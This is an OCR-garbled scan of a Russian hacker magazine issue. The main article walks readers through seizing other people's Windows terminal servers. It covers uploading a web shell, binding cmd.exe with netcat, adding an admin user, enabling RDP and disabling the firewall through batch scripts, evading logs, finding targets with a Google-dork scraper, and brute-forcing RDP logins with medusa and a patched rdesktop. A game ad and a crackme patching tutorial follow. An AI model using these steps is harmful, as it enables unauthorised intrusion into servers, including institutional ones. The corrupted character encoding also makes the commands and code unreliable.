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ТЕРМИНАЛЬНАЯ ЭПОПЕЯ 



КАК ЛОМАЮТ ТЕРМИНАЛЬНЫЕ СЕРВЕРЫ 



ПОЧТИ КАЖДЫЙ ПРИВАТНЫЙ ФОРУМ РУНЕТА ПЕСТРИТ СООБЩЕНИЯМИ О ПРОДАЖЕ ДЕДИКОВ. ОЕОІСАТЕО 5ЕРѴЕР, ИЛИ ПРОСТО 
ДЕДИК - ПОЛЕЗНЫЙ ПРЕДМЕТ В РУКАХ ХАКЕРА. ВО-ПЕРВЫХ, ОН МОЖЕТ ПОТРЕБОВАТЬСЯ ПРИ ОБЕСПЕЧЕНИИ АНОНИМНОСТИ 
И ПРИ СОВЕРШЕНИИ «КОВАРНЫХ ЗЛОДЕЯНИЙ», ВО-ВТОРЫХ, ВСЕ ЖЕ ЭТО Ѵ05, НА КОТОРОМ ВОЗМОЖНО ХРАНИТЬ ГИГАБАЙТЫ КОН- 
ФИДЕНЦИАЛЬНОЙ ИНФОРМАЦИИ ДАЖЕ ПРАВИТЕЛЬСТВЕННЫХ СТРУКТУР. КОНФИГУРАЦИОННЫЕ МОЩНОСТИ СЕРВЕРА МОГУТ 
БЫТЬ ИСПОЛЬЗОВАНЫ ДЛЯ ЗАТЯЖНЫХ ВРІІТЕЕОРСЕ-АТАК НА СЕТЕВОЙ СЕРВИС. ШИРОКИЙ КАНАЛ, В ОСНОВНОМ, ВАРЬИРУЮ- 
ЩИЙСЯ ОТ 10 Д0 100 МБ/С, УС КОРЯ ЕТ ПРОЦЕСС ПОЛУЧЕНИЯ РЕЗУЛЬТАТА, А ТАКЖЕ СОДЕЙСТВУЕТ НАКАЗАН ИЮ ТВОЕГО НЕПРИЯТЕ- 
ЛЯ 0005-АТАК0Й. В ГОЛОДНЫЙ ГОД ДЕНЕГ НАТАКОЙ ПЛАЦДАРМ ТРАТИТЬ МОЖЕТ НЕ ЗАХОТЕТЬСЯ, ПОЭТОМУ СТОИТ ЗАДУМАТЬСЯ 
О СПОСОБАХ ПОЛУЧЕНИЯ ЕГО НАХАЛЯВУ. 



ачнѳм с простого. Воспользо- 
вавшись уязвимостями веб- 
приложений, зальем шелл на 
взломанный сервер, чтобы оп- 
ределить платформу (ОС) сервера. Затем с 
помощью встроенных средств интерпрета- 
тора аплоадим пс.ехе (пс.ехе -I -р ПОРТ -б -е 
стб.ехе). 

Теперь используем РиЛу (или любой дру- 
гой клиент) для коннекта на заданный порт. 
Добавим нового суперпользователя в базу 
учетныхзаписей: 

пеіизег ЛОГИН ПАРОЛЬ/асІсІ 

пеі Іосаідгоир асітіпізігаіогз/асісі асітіп 



Вполне возможно, что РЮР изначально бу- 
дет вырублен и после попытки коннекта с 
помощью Мзізс.ехе ты получишь отказ. Но 
никто не мешаеттебе его включить:). 

Это делается командой: 

пеі зіагі "ТегтіпаІ Зегѵег" 

Либо через реестр. Я покажу, как модифи- 
кацией реестра включить РЮР, на приме- 
ре. Для этого создаем удаленно .Ьаі-файл 
(либо файл, аналогично исполняемый). 
Загружаем его через залитый скриптовый 
шелл, запоминаем путь и исполняем его из 
консоли. 



есНо ой 

ІР [%і ]==[] (ЕСНО ІІзаде: %0 сотриіегпате) ЕІ_ЗЕ ( 
гед асісі "\\%1\НКЕМ\ЗУЗТЕМ\СиггепіСоп1:гоІЗе1:\СопігоІ\ 
ТегтіпаІ Зегѵег" /ѵ ГОепуТЗСоппесііопз А НЕСЦЖОРЮ 
/6 0 А 

гед асісі "\\%1\НКЕМ\ЗУЗТЕМ\СиггепЮоп1гоІЗеі\ 
Зегѵісез\ЗІпагесІАссезз\Рагате1:егз\ЕігеѵѵаІІРоІісу\ 
□отаіпРгойІеХОІоЬаІІуОрепРогізХизі" /ѵ "3389:ТСР" 
А РЕО_32 /6 "3389:ТСР: ЕосаІЗиЬЫеі: ЕпаЫесІ: Ретоіе 
Оезкіор" А) 
раизе 

Следуетотметить, что службаТегтіпаІ Зегѵег 
требует предварительного ее наличия. На- 
пример, если наХР онауже присутствует, то 
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рі*іН4Нг Г'гѵкВДЦ РШнМІІ ЬННІН 

Й№Г*йнй 

С'а.тѵ^ПйР 






□ _ 



Бсхик 



Кййтѵ^ій 

пзоішвдіягюогоі юіъэсыих&кяттювюі 1»жзд»и 



О !Щрі*Н Рггшвгі 



> Расшифровка паролей от Ѵй5 с помощью сторонних 
программ 



Смя (Л 

о 



-!- 



ІІІА Ли*йіф*і рінЛЧ+ 
Ргоійс НйЬв. гпгі 



ОяшщпйѴгт | в « ф * н - 

ѴоАпОмсіиц С:адіЯ0€ІМБ^йЕгаЗ?. 

№ 



> Пускаем М5Т5С через ЗоскСар 



на некоторые серверные платформы ее необходимо 
дополнительно устанавливать. 

□ Анонимность при подключении к ПОР 

Не стоитзабывать, что все попытки подключений могут 
логироваться как в ѴѴІпсІоѵѵз РігеѵѵаІІ, так и в ЕѵепіѴіеѵѵег. 
Безусловно, это зависитот принятой админом политики 
безопасности, но, например, ѴѴіп2003поумолчаниюпи- 
шет лог, кто и откуда коннектился на машину. 

Для иллюстрации приведу пример такого журнала: 

ЗиссеззІиІ І_одоп: 

ЦІзег ІЧате: Асітіпізігаіог 
Оотаіп: ЗІІРЕВЗЕВѴЕВ 
І_одоп Ю: (0х0,0х133Р833В) 

ЬодопТуре: 10 
І_одоп Ргосезз: Цзег32 
АиІГіепІісаІіоп Раскаде: ІЧедоІіаІе 
ѴѴогкзіаііоп ІЧате: 51ІРЕВЗЕВѴЕВ 
Ьодоп ѲІІЮ: - 

СаІІег ЬІзег ІЧате: ЗІІРЕВЗЕВѴЕВ$ 

СаІІег Оотаіп: ХАКЕР. ги 
СаІІег Ьодоп Ю: (0х0,0хЗЕ7) 

СаІІег Ргосезз Ю: 7248 
ТгапзііесІ Зегѵісез: - 
Зоигсе ІЧеІѵѵогкАсІсІгезз: ТВОЙ ІР 
Зоигсе Рогі: 3046 

Физически данный лог-файл по безопасности находит- 
ся здесь С:\ѴѴІМ2003\Зузіет32\сопЛд\ЗесЕѵепі.Еѵі, но 
просто так его не удалить — доступ к файлу возможен 
только из консоли ттс (команда ттс из ПУСК->Выпол- 
нить). Причем даже после проведения «легитимной» 
операции по удалению лога ЕѵепІ Ѵіеѵѵег зафиксирует 
попытку удаления и оставит информацию, кем была 
сделана очистка: 

ТГіе аисііі: Іод \л/аз сіеагесі 
Ргітагу ІІзег ІЧате: ЗУЗТЕМ 
Ргітагу Оотаіп: ІЧТАІЯНОВІТѴ 
Ргітагу І_одоп Ю: (0х0,0хЗЕ7) 

СІіепі ЬІзег ІЧате: Асітіпізігаіог 
СІІепі Оотаіп: 51ІРЕВЗЕВѴЕРІ 
СІІепі І_одоп Ю: (0x0, 0x1 ЗЗР8ЭЗВ) 

Дело в том, что параллельно с этим ѴѴІпсІоѵѵз РігеѵѵаІІ пи- 
шетлогподключений, физически располагающийся на 
СЛѴѴІЫООѴѴЗХрЛгеѵѵаІІ.Іод. Основой нашей идеи явля- 
ется то, что настройки этого брандмауэра хранятся в 
реестре, поэтому модификацией реестра можно либо 



отключить ѴѴІпсІоѵѵз РігеѵѵаІІ, либо внести произвольное 
приложение в список доверенных. 

Для отключения фаервола создаем Ьаі'ник, загружаем 
его на сервер (через шелл) и запускаем (через консоль). 

@есГю оД 

пеі зіор "ѴѴІпсІоѵѵз РігеѵѵаІІ/Іпіегпеі Соппесііоп ЗГіагіпд (ІСЗ)" 

> "%Тетр%.\кіІІ. гед" ЕСНО ВЕОЕОІТ4 
»"%Тетр%.\кіІІ.гед" ЕСНО. 

»"%Тетр%.\кіІІ.гед" ЕСНО [НКЕѴЩОСАІ__МАСНІІЧЕ\ЗѴЗТЕМ\ 
СиггепЮопігоІЗеАЗегѵісезХЗГіагесІАссезз] 

>>"%Тетр%.\кіІІ.гед" ЕСНО "Зіагі"=сІ\л/огсІ:00000004 
»"%Тетр%.\кіІІ.гед" ЕСНО. 

»"%Тетр%.\кіІІ.гед" ЕСНО [НКЕУ_ЬОСАІ__МАСНІІ\ІЕ\ЗУЗТЕМ\ 
СиггепіСопігоІЗеАЗегѵісезХѵѵиаизегѵ] 

»"%Тетр%.\кіІІ.гед" ЕСНО "Зіагі" =сіѵѵо гсі : 00000004 
»"%Тетр%.\кіІІ.гед" ЕСНО. 

ЗТАВТ/ѴѴАІТ ВЕОЕОІТ/3 "%Тетр%.\кіІІ.гед" 
ріЕЬ "%Тетр%.\кіІІ.гед" 

Во избежание казусов с анализом трафика или скрытых 
логгеров, установленных насистеме, пустим подключе- 
ние к ВОР через соксы. Сделать это можно с помощью 
программы ЗОСКЗСАР. Добавь тзізс.ехе в список про- 
грамм, туннелируемых через Зосксар. 

Аналогичный вариант — использовать Е-Ьогбег бгіѵег 
или Регтео Оіѵег, которые работают на уровне драйве- 
ра и позволяют редирекить траф со всех приложений 
системы на выбранный зоскз. 

□ Раз, два, три, четыре, пять — идем 
дедики искать! 

Но что делать, когда нам нужна массовость, а не один 
дедик с ВОЗ, поднятым с шелла? Наверное, ты подумал 
о сканере ІММАР и запросе птар -зТ -р 3389 сеть/24 > 
Іод.М? Конечно, это даст определенный результат, но 
многие админы изменяют порт ВЭЗ, и ты можешь полу- 
чить кучу мусора с посторонними баннерами сервисов. 
Поэтому поступим по-другому. Для взлома заюзаем ме- 
тод Ооодіе Наскіпд (вообще, в кругах опытных хакеров 
к нему не относятся очень серьезно). Откроем гугл и во- 
бьем туда следующий запрос: 

Гійр://ѵѵ\л/\л/.доодІе.сот/5еагсІп?д=ітШе:Вето!е.ОезкЮр.ѴѴеЬ. 

Соппесйоп%20іпигІДзѵѵеЬ 

«Какая связь поисковых запросов и ВОР?» — спросишь 
ты. Дело в том, что многие админы используют специаль- 
ный плагин, имитирующий ѴѴЕВ-интерфейс для подклю- 
чения. Его название ТЗѵѵеЬ ( Іл1:1:р://1:зѵѵеЬ.ерТІ.сІл ^. Так что, с 




> На диске ты найдешь 
список обнаружен- 
ных мной серверов и 
диапазоны ІР-адресов с 
каналами выше 10 Мб/с. 
Я думаю, эта информа- 
ция тебе пригодится :). 




>ТЗМоЬІІез ( Мр:// 
ѵѵѵѵѵѵ.зііарезегѵісез. 
сот/еп/ргосіисіз/сіеіаііз. 
рИр?ргосІисІ=Ізт&рІаДо 
гт=ппісІр2 ) - это мобиль- 
ный клиент ѴѴІпсІоѵѵз 
Ветоіе Оезкіор РгоІосоІ 
(РЮР). В моей жизни эта 
тулза занимает факти- 
чески первостепенное 
значение. Используя эту 
тулзу, ты легко можешь 
контролировать процес- 
сы надедике, например, 
отдавать команды 
собственному ботнету с 
мобильника. 

Из разряда альтернатив 
получения дедиков 
следует выделить АЗР 
Аисіііог. С его помощью 
ты сможешь найти в 
диапозоне ІР адресов 
бажные серваки на 
базе АЗР. ІЧЕТ ( ИДр:// 
тісііаеісіаѵѵ.ога/ргоіесіз/ 
азр-аисіііог ). 
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ШАРМ ІМО**ШАКН АКИ ІЫС Ѵои Ьаѵе ассеззесі а Ііігііе... 



ШВМІНЕ к: ѴАРМІМ6 ки ^АВМІМе Уои Каѵе ассеззей а ѴгШ ЗМе$ 
ОерагІтепЬ о ( ІаЪог,ЕтрІоуее Т іаіпіпд АсІтІпізІгаІіол^оЬ Согрз СотриЬег 
5у$1е<тшЫсЬ тау Ье изегі огіу Гог оШсіаІ Воѵеттепі Ьизіпезз Ьу аиІЬогігесІ 
регзолпеі. ІІзе оГ 1Ы$ §у$*ет ичйЬоиГ аігёНогіга&іоп оі Гог ригрозез Гог ѵѵЬісН 
аиіИогігаІіоп На® по* Ьееп дгапЫ із а ѵіоіаііоп о( РесІагаІ Гаю апсі сал Ье 
рипІзНесІ ѵчІЙі (Ілез оі ітргізоптепі (РиЫіс Г_аѵи 93474). АН іпГогтаІІоп ол ГЫз 
сотриГег зузЬет тау Ье іпІегсерГесі гесогсЫлеаА соріеі апгі гіізсіозесі Ьу 
апсі Іо аиГИогІгесІ регзоппеі Гог оГІісіаІ ригрозез, іпсІисІІпд сгітіпаі іпѵезйдаІІопз. 
Ассезз оі изе ей іНіз сотриГеі зузіет Ьу апу регзоп ѵѵНеіНеі аиГНогігес! оі 
ипаиГНогІгесі оолзІІШІез солзелі Го ГІіе$е Гегт& 
швміме н5 ѴАРімімб и ѴАі=іміме 



ОК 



'ч. 



у 



> Предупреждение перед подключением 



помощью одного запроса ты найдешь сотни 
потенциально уязвимых машин с включенным 
ПОР. Чтобы не утомлять себя ручной работой 
по анализу ссылок, сваяем скриптец: 

ѵаг іе = пеѵѵ АсііѵеХОЬіесі 
("ІпіегпеіЕхрІогег. Арріісаііоп"); 
іе. ѴізіЫе = {аізе; 

Іог (ѵаг с_іпсІех = 0; с_іпсІех < 1 0; с_іпсІех++) { 

іе.Маѵідаіе("Ыір://ѵѵѵѵѵѵ.доодІе.сот/зеагсІп?д=іпіШе: 

ВетоІе.ОезкІор.ѴѴеЬ.СоппесІіоп%20іпигІ:ІзѵѵеЬ&пііт 

= 100&зіагі=" + с_іпсІех*10 + "&Ы=еп"); 

ѵѵЬІІе (іе. Ьизу) { ѴѴЗсгірі. ЗІеер (100)} 

ѵагІпк = ""; 

Гог (ѵаг і = 0; і <іе.сІоситеп1;.ІІпкз.Іепд1;Іп; І++) { 

Іпк = іе.сіоситепі.ііпкз [і]. Гігеі; 

ІГ (Іпк. іпсІехОГ ("доодіе") == -1 ) { 
іГ (Іпк. іпсІехОГ ("саскіе:") == -1 ) ѴѴЗсгірі.ЕсІпо (Іпк);} 

1 

1 

іе. ОиіД); 

После его исполнения ты получаешь отчет 
в текстовом виде. Перед тобой список най- 
денных машин, имеющих на своем борту 
ПОР. Определили мы это по установленно- 
му скрипту для управления удаленным ра- 
бочим столом. Скажу сразу, что ты можешь 
обнаружить много ведомственных или пра- 
вительственныхзощтаккактерминалы рас- 
полагаются напредприятиях, вбольницах, а 
также в различных офисах. 

О Абордаж терминала 

Устремив свой взор в багтрак, ты осоз- 
наешь, что ПОР практически неуязвим, а 



из-за специфики протокола перебор паро- 
ля программами, вроде ТНС Нусіга, на порт 
ПОР затруднителен. Прежде всего, здесь 
играет роль шифрованное соединение и 
обмен ключами. Дело в том, что ПОР можно 
настроить наЗуровня безопасности: 

• Высокий уровень безопасности: исполь- 
зуется 128-битный ключ. 

• Средний: 56-битный ключ в клиентах 
ѴѴіпбоѵѵз 2000 и выше, или 40-битный в пре- 
дыдущих версиях ОС. 

• Малый уровень: в отличие от предыдущих 
вариантов, шифруются только данные, пе- 
редающиеся от клиента к серверу; исполь- 
зуются 56- или 40-битные ключи. 

Везде фигурирует шифрование. Что же 
делать? Сымитировать подобный крип- 
тообмен данными достаточно трудно, а 
искать баги в таком сбалансированном 
продукте — дело времени. Но выход есть 
— это организация брутфорса с помощью 
средств, обыденно требующихся для под- 
ключения. 

Вначале собираем гбезкіор (ѵѵѵѵѵѵ.гбезкЮр.ога ) — 
ореп-зоигсе утилита для подключения к 
ѴѴіпбоѵѵз-терминалам. Программа запуска- 
ется в Х-ѴѴіпсІоѵѵ и имеет интуитивный интер- 
фейс, поэтому ты можешь использовать ее 
вместо стандартного Ыпих ПОР. На диске к 
журналу ты найдешь уникальный патч, мо- 
дифицирующий исходник и превращающий 
клиент для коннекта в брутфорс. Мы же при- 
меняем его перед процессом сборки. 

сШ -и гсІезкіор-1.4.1/гсІезкіор.с гсіезкіор-і ,4.1-сІіс/ 
гсіезкіор.с 



Для усиления практической выгоды заюзаем 
популярный брутфорсер МЕОІІ8А (РагаІІеІ 
Ыеіѵѵогк І_одіп Аибііог, НДрѴ/ѵѵѵѵѵѵТооГиз.пеІ:/ 
Ітк/тебиза/тебиза.ІпітП . С ее помощью мы 
добьемся перебора по множеству найден- 
ных аккаунтов. 

тесіиза -М ѵѵгаррег -т ТѴРЕ:ЗТОІІ\І -т РВООтсІезкіор 
-т АРОЗ:"-и %ІІ -р - %Н" -Н Иозіз.іхі -II изегз.іхі -Р 
раззѵѵогсІз.М 

Если тебя смущает піх'овость софта, смело 
скачай утилиту ТЗОгіпбег под винду, кото- 
рая превращает такое стандартное сред- 
ство для подключения, как ВоЬосІіепІ ( Гір:// 
}1р.тісгозоІ1.сот/РезКі!/ѵѵіп2000/гоЬосІіеп}.2Ір ). 
в многопоточную хакерскую тулзу. 

Получив доступ к дедику, нужно немедлен- 
но оглядеться. Следует понять, для чего 
он используется и зачем он вообще под- 
ключен к сети. Возможно, он сделан для 
проведения каких-либо тестов, испытаний 
(имеетмаленький аптайм из-за активности 
админа), либо же он держит на себе хос- 
тин г/СУБД/Д НС/какой-либо сервис. В моем 
случаеаптайм был крайне мал, анапичкан- 
ность установленного софта указывала на 
то, что админ держит дедик для огромного 
файлохранилища, не отказывая себе в 
удовольствии посерфить ѵѵеЬ. 

Таким образом, брутфорс ежедневно при- 
носил мне все новые и новые связки адми- 
нистраторских паролей на \Ю5-сервера. 
Некоторые из них были такие простые, что 
я начал сомневаться в компетентности на- 
ших системных администраторов. НС 
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ДВА ДВѴХЕЛРКНЫХ 



ПРАВИЛЬНЫЙ ЖУРНАЛ о КОМПЬЮТЕРНЫХ ИГРАХ 



ИГРА МЕСЯЦА 



НЕВ0Е5 






НРБ САШИ 

ЭАЙйПОСЕРРАнть 



ТЕ .ЕРЬ ПО. = уСГ*р 



[Ш СЖиЩѲІМІ НШвІІІРІІВ 

> ДВА 

двухслойных 01/0 (общий объем 17 ОЬ); 

> ДВА 
постера; 

> ДВЕ 

наклейки!!! 



Красиво, 

захватывающе, 

динамично. 

Самое удачное 
воплощение правил 
Оипдеопз & Огадопз 3.5 
в компьютерных играх. 



Переворот в жанре: 
лучшая стратегия 
2006 года от создателей 
НотеѵѵогІсІ и УѴагйат- 
тег 40.000: йаѵѵп 
оГ УѴаг. 



Таким мог бы стать 
Зузіет 5 боек 3... 



Чертовски достоверный 
автомобильный 
симулятор! 



> Превью : Аззаззіп'з СгеесІ, 
ВіозИоск, «Войны Древности: 
Спарта», кауплап каѵіпд КаЬЬісІз, 
«Братва и Кольцо», Ргакепзапд, 
Сго^езцие: Негоез НипСесІ, 

«Отель «У погибшего альпиниста», 
ЫеесІ ^ог БреесІ СагЬоп... 

> Рецензии на Сотрапу оГ Не- 
гоез, «ТИе Біплз 2: Питомцы», СТк 
2, РІРА 07, І_ЕСО 51а г ѴѴагз II, ТИе 
БЫр, ^оіп1: Тазк Рогсе , «В Тылу 
Врага 2», Вгокеп Бѵѵогсі: ТИе АпдеІ 
о? ОеаШ, СаІІ оМиагег , ЕІ Маіасіог, 
Рагаѵѵогісі , БаІ'есгаскег, СТІ Касіпд, 
ЫНІ_ 07, «Альянс: Двойной Удар», 
Атегісап СИоррег 2, «Черный 
Корсар», Огадоп'з І_аіг РЮ... 

И многое-многое другое! 














ТРЕНИРУЕМСЯ НА КОШКАХ 



ТРЕНИРОВКА ВО ВЗЛОМЕ ШАРОВАРНЫХ ПРОГРАММ 



ШАРОВАРНЫЕ ПРОГРАММЫ - ДЕЛО РУК НЕ ТОЛЬКО НАЧИНАЮЩИХ ПРОГРАММИСТОВ, НО И ПРОФЕССИОНАЛОВ, ЖИВУЩИХ 
ТОЛЬКО ЗАСНЕТ РЕГИСТРАЦИИ ПОЛЬЗОВАТЕЛЕЙ ЭТИХ ПРОГРАММ. ЕСЛИ СОФТ ДЕЙСТВИТЕЛЬНО ОТВЕЧАЕТ ВСЕМ СВОИМ ТРЕ- 
БОВАНИЯМ И СТОИТТОГО, ЧТОБЫ ОТДАТЬ ЗА НЕГО КАКИЕ-ТО 10-50$, ТО Я ПРЕДПОЧИТАЮ ПОЙТИ ЧЕСТНЫМ ПУТЕМ. НО ЕСЛИ МЫ 
ОТКРЫВАЕМ ПРОГУ И ВИДИМ, КАК ГОВОРИТСЯ, ФИ ГУ, ЗА КОТОРУЮ ТРЕБУЮТіОО, АТО И БОЛЬШЕ АМЕРИ КАНСКИХ ПРЕЗИДЕНТОВ, 
ТО НЕТ ПРОЩЕНИЯ ТАКИМ ПРОГРАММИСТАМ, И ПРОГИ ИХ НУЖНО ЛОМАТЬ, ЛОМАТЬ И ТОЛ ЬКО ЛОМАТЬ. И ПОГОВОРКА «ЛОМАТЬ 
- НЕ СТРОИТЬ» В ДАННОМ СЛУЧАЕ НЕ УМЕСТНА. 



егодня мы не будем заниматься 
противозаконными действиями, 
взламывая платные программы. 
Вместо этого мы попробуем по- 
тренироваться на ресурсе сгаскппезЩе. Это 
сайт, на котором можно найти программы, 
специально созданные для того, чтобы их 
«ломали». Точнее, чтобы исследовать раз- 
личные методы защиты и делиться опытом 
на специальном форуме. Все сгасктез де- 
лятся на 9 степеней сложности. В этой ста- 
тье мы «постигнем» лишь первую из них. 

□ Сгаск іНет АШ 

Я хочу показать, как можно обойти самую 
простую защиту проверки регистрацион- 
ного номера тремя способами. В первом 
случае мы будем просто переводить поток 
из ложного русла в истинное, во втором — 
сделаем так, чтобы прога сама выдавала 
верный номер в ответ на введенное имя, а 
в третьем — напишем свой генератор се- 
рийного номера на Ассемблере. Причем в 
последнем случае мы даже не будем углуб- 



ляться в дебри алгоритма, атупо скопируем 
дизассемблированный код, адреса памяти 
заменим своими переменными, а переходы 
по адресам — переходами по заранее заго- 
товленным меткам. Ломать будем подопыт- 
ный сгаскте #2 от Ьаіагде. Взять его можно 
на нашем ЭѴЭ. 

Для взлома нам понадобится такой софт: 
РЕЮ — для проверки бинарного файла на на- 
личие упаковщика, а также для определения 
языка, на котором написана программа (что 
в нашем случае совсем необязательно). 

ОІІу — отладчик, в котором мы, собственно, и 
будем отлаживать подопытную прогу. 

НІЕѴ — НЕХ-редактор и дизассемблер од- 
новременно. Очень полезная вещь. В нем 
мы будем править байты по найденным 
адресам. 

□ Экзекуция #1 

Распаковываем архив и запускаем сгаскте. ехе. 
Видимтипичноеокносдвумя ебіі’ами итремя 
Ьиііоп’ами. В первом есІІІ'е нас просят ввести 
имя пользователя, а во втором — регистраци- 



онный код. Вводим свое имя и любой номер. 
Нажимаем «СИеск Ш». Выходит сообщение 
МеззадеВохА с заголовком «Вас! Воу» и тек- 
стом «ІЧоіе, іИаіз поі іі! Тгу адаіп». Выходим из 
программы, запускаем ОІІу и открываем в нем 
сгаскте. ехе. В командной строке ОІІу пишем 
«Ьрх МеззадеВохА», жмем Е9, чтобы запустить 
программу. Вводим имя, регистрационный 
код и опять жмем «СИеск Ш». Активизируется 
ОІІу, и мы вываливаемся по адресу 00401 2ЕЗ. 
Это адрес процедуры МеззадеВохА в модуле 
ЕІзег32.сІІІ. 

Перед тем как выдать сообщение, Ызег32.сІІІ 
должен взять из стека необходимые для этого 
данные — стиль, заголовок, текстсообщен ия 
и имя родительского окна. Если мы посмот- 
рим чуть выше, то увидим команду РІІ8Н 10. 
И мен но с нее начинается толкание в стек все- 
го, что нужно для отображения МеззадеВох. 
Поставим курсор на эту строчку и опреде- 
лим, с какого адреса мы сюда попали. ОІІу 
пишет «Зитр Нот 004012ВС». Посмотрим, 
что у нас висит по этому адресу... «3 N2 ЗН ОРТ 
сгаскте. 00401 2Э4», а на строчку выше — ус- 




/078 



ХАКЕР 1 1 /95/ 06 





взлом 



» 



ілі.м ;г.-: 
•ѵгіп і :сг. 


, е.й зіёімзо 

■ С-5С9 1 


-Щ. <^:тр.г,ксгп#1зг.1ѣ^гспрс: 

ЯН ЕЧХ.ЕЙХ ____ 




■1Ш-Ц.И2ЕЕ 


. ёЯ 4(3 


— ч (с. - .ВпМі 1 Ш. ДОК Пк т іДІЧЦ 1 іГІ Я 

-;е 


ГВДуІе - 


№ ОКІПВ ІСОПЙЕТЕЯ1ЕКІПЕ ЙРРІ_ИП)Й1_ 




. СЗ СБ624С00 


:-И С X ані к 1 . 004О62Ш 


Т іт ІнЕ = 




йЛйіН 1 : 


. Е-1 ЯС624ЙЮ 


Пен 


Г«*Т = 


" ■'€ О г г Ь &Т 5 тГ|^ г іъіі т с -І-гЦ +Э/ бс иі і 




. ез 


н-н гн- >ДС РТР: И; 


ХГіиГ-*? [■ 






. Е-; 


.н. 1 ■ :р . - Г Т 1 1- ■ -.л Рлк й ; 


. 








снеят 






ао-іаі 204 


> ІІА 39 


РЦ ъм 3 9 


Г'5-^К = 


Г1К_ ■:«!-: ; 1іе_ [ ССГ-5НЙГЙІ. : іШ_йРР1_гКіС'Ш. 


АО-ІЙ120* 


. ее №Э4Ж 




Гн !ч " 


- н 


■ :• : 2б: 


. р-І! СГСМСМ 


РЦЗН м К к ги .06*0021 Г 


Ттхі = 


■‘Нор*, пб* КІЕ/ТГУ а^л ігі' 1 ' 


Э0-Ш12ЁС 


. РіГГБ 63 


ИІЪИ г-1 ОРЛ Г^р. [ЕЭР*83 


ЬОипсг 




геа 


, е.з 


сйі_і_ < .дтр . «гаг, № 






зшкиі-Ег 


,> ё.-Е сѳйгйий 


пен геэ 




- 220 (€32. іі 


.'•.■•Ч'Ц.Ь. 


. ёі 43ЧЕ.54КЛІ 


гМіН сг іСк не . Л і- 


1 . ■ 1 ■ 3% 1 . - ■_ I -."Л 065*9 1 



>Два сообщения о регистрации 









-ІПІМ 


1 1 

.[№'ѴЛ2йѢі 




і Ё ■ Щѵ іЕ)1 2 н ѵ йгЗь 


— іі п&еѵ с». іі 

Иі| |||||п ПіііИЦЦІІЬІДМ^Ші 


,004012 АО: 


ЬѲ4?6540вВ 


ризЬ 


000406649 ? ВІ Ре Г 


іг 


.0П4П12Й0: 


Й94^Й44000 


рцзЬ 


ППП406449 


* 


. 004012 


Е8Э6010ООО 


с -1 1 1 


ППП4П1ЧР0 


(25 


. 1)04012 НП: 


ОВС0 


.* с* 


в ах * со. 




,00401200: 


604 9674000 


ініз и 


О004О674Ѵ . '*<; I ' 


* 


. ЕШ4012С1 1 


ЬПОО 


ривіі 


000 




. ЕШ4012СЗ : 


6П0С 


уизіз 


ООО 




,00401205: 




УІІ5 1» 


064 




, 0040 1 2 С 7 : 


РР750В 


УІІЙІІ 


сі, ЕеЬрПООООѲ] 




. 00401 2СП: 


Е8 ВЗВИВ 000 


саІІ 


.000401362 


<3> 


. 00401 2СР: 


90 


ГІОУ 






* 004012 ІШі 


90 


пор 






.0040121)1 : 


90 


пор 






.0П4П12П2: 


ЕВ14 




. ППП401.2ЕЙ 


^45 


, 004012 М: 


6Л1С 




010 




. 00401206: 


60ВЁ634МО 


ризіі 


пипдіг^<іПіГ .1* ч, ^ 




« ПП4П1 2 1)й : 


60Е7624ОО0 


РіізЬ 


0Й04Ѳ62Е? Г-Ы/ 


Іі 


. 004012 ППі 


РР750В 


ривіі 


а, [сЪізігшвоеі 




. 004012 ЕЗ: 


Е8Б4000О0О 


САІІ 


.000401 39 С 


<55 


_ 0040 1 21:8 : 


6000020000 


рисЬ 


000000200 ; н О 1 


іі 


, 004012 ЕВ: 


69496^4000 


рііБІі 


000406649 з 11 0с Г 


іі 


. 00401 2 Р2 з 


Н8РР0ШООО 


саІІ 


.0Ѳ04013Б4 


<65 


1 ііт* гидйіій ш 




ѵ2*ТЯ!! вІГШГ ѵ •,< 


ііез ШЯиіД: 



>Так должен выглядеть код в НІЕѴѴ после экзекуции 



ловиѳ ОР ЕАХ, ЕАХ. То есть если мы поменяем условие 
на противоположное, то перехода не будет и программа 
продолжит выполняться. Поставим курсор на ОР ЕАХ, 
ЕАХ, нажмем пробел и до пишем вначале всего одну бук- 
ву «X», чтобы получилось «ХОР ЕАХ, ЕАХ». Опять жмем 
Е9 и... успешно проходим регистрацию. Можно также 
поменять строчку «ЛХ2 ЗНОРТ сгаскте. 00401204» 
на «Л ЗНОРТ сгаскте. 00401204». Какой способ ис- 
пользовать из этих двух, неважно. Оба дают на выходе 
одинаковый результат. Открываем сгаскте. ехе в НІЕѴѴ, 
жмем Е4, выбираем бесобе, жмем Е5, чтобы перейти по 
указанному адресу, и пишем «004012ВС». После того 
какокажемся понужномуадресу.жмем ЕЗдля редакти- 
рования и Е2 для режима ассемблера. Теперь в появив- 
шейся команде пишем «6Е» вместо «б N Е», Епіѳг, Езс, Е9, 
ЕЮ. Запускаем сгаскте. ехе, вводим данные и успешно 
регистрируемся. Программа говорит, что мы хорошие 
мальчики и можем пойти попить чай. Все, программу 
можно считать взломанной. 

И все бы ничего, да только этот метод прокатывает да- 
леко не всегда. Иногда правильность регистрационно- 
го номера проверяется в разных местах программы, в 
разное время и при разныхусловиях. Поэтому... 

□ Экзекуция #2 

Сейчас мы сделаем так, чтобы наш сгаскте. ехе сам по- 
казывал нам верный сери йник в ответ на любое введен- 
ное имя пользователя. Опять открываем программу в 
О Ну и пишем в командной строке «ЬрхѲеШІдІіетТехіА», 
то есть ставим бряк на все получения текстовых строк 



из ѳбіі’ов. Жмем Е9, вводим имя, регистрационный код, 
жмем «Сбѳск іі!» и попадаем на 00401141. Нажимаем 
один раз Е8, чтобы выполнилась процедура, и смот- 
рим дальше. Идет проверка на количество символов в 
имени пользователя (как оказалось, их должно быть не 
менее четырех). Кстати, после выполнения процедуры 
ОеШІд ІіетТехіА в регистр ЕОХ возврати лея адрес наше- 
го имени. Именно оттуда я и узнал, что это только про- 
верка на количество символов в имени. Значит, гене- 
рация номера идет дальше. Опятьжмем Е9 и видим, что 
теперь мы попадаем прямиком на проверку серийного 
номера, причем в процедуре выше и в процедуре ниже 
уже есть адреса памяти, в которых содержится сгенери- 
рованный номер. Теперь нам только остается поменять 
строку «ОѳШІдІіѳтТѳхіА» на «ЗѳШІдІіѳтТѳхіА» и пере- 
дать функции адрес регистрационного номера. Так-то 
оно так, да вот только в программе не используется 
«ЗѳШІдІіѳтТехіА», и в ІІзег32.бІІ эта процедура не опре- 
делена. Но это ничего, зато у нас определена процеду- 
ра ЗѳпбОІдІіѳтМѳззадѳА, которая хоть и занимает чуть 
больше байт, но в данном случае вы полнит то же самое, 
